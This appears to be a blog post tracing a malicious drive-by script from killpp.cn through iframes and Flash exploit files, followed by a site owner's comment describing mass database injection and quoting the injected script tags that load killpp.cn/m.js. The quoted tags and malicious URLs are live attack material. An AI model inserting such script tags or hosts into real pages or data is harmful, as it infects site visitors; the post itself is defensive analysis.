The content of this script calls 2 iframe:

http://www.qiqicc.cn/dj.htm calls the following iframe

http://www.killpp.cn/456.htm embeds these 2 flash: 4561.swf and 4562.swf

The swf files downloads 2 other swf files (based on flash player version): WIN%209,0,115,0i.swf and WIN%209,0,115,0f.swf

Virustotal result of WIN%209,0,115,0f.swf

Virustotal result of WIN%209,0,115,0i.swf


One Response to “www.killpp.cn/k.js”

  1. I have a Flash word game that posts peoples’ scores and results to a SQL db via ASP. The user only has the opportunity to enter their name, city, and then the Flash itself posts to the DB at the end of the game with the players’ word guesses and their score. There is no opportunity for any hackers to insert special characters such as the tag symbols or slashes or quotation marks. Yet, a hardcore player of the game wrote me after noticing a small uneventful glitch in the scoreboard. There are about 111,000 rows in my db and in one particular field, about 105,000 of them are truncated from what should be about 70 characters to what appeared at first to be about 30. I was stumped because I write an .asp script telling me the len() character length of the field and it was saying 77 for all of them when clearly i could count myself only 30 or so characters! .. So it took me an hour for the lightbulb to go off that perhaps there’s a hidden script that my browser isn’t displaying to the screen when showing the contents of the data. I did a “replace” on the “” (to “[” and “]”) and voila — here is what it yielded:

    TANGO#11%675*4;UNCLE#15%517*4;[script src=http://www.killpp.cn/m.js][/script].
    .RACKS#11%675*4;PIANO#8%783*4;D[script src=http://www.killpp.cn/m.js][/script].
    etc etc times about 105,000 🙂

    Of course, before I noticed this, I ran the script without that tag converter about 30 times, so that script ran on my machine (w/ firefox) probably about 200 times.. i ran virus checkers and they say everything’s ok but I honestly have no idea if anything really was compromised or harmed yet. 😦

    But anyway, as you can see, the first 30 or so characters are correct, it should be words and symbols and numbers, but then the script seems to have been inserted on top of what should be the rest of my little word/number string. The peculiar thing is, these were not inserted via any of my forms or via my game, because most of the rows affected are records that have been in existence since 2005. It’d soewhat make sense to me if the breach affected NEW fields being added, say, this week, but in reality they went through almost all of the rows in the db and changed them to have this script on it. Now, the hacker didn’t really do their homework, because that field is never displayed to the users of the game, since it’s for internal use only of building score statistics, to where only the scores are displayed , but I most definitely accidentally ran them myself in trying to display the data to my own screen via my test script.

    What was interesting to me was, when I Googled “killpp.cn”, I saw a tremendous amount of innocent-looking websites in the return that appear to have this script embedded in their code unknowingly.

    anyway it appears a TON of sites have this script (or scripts from that killpp.cn domain) embedded.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: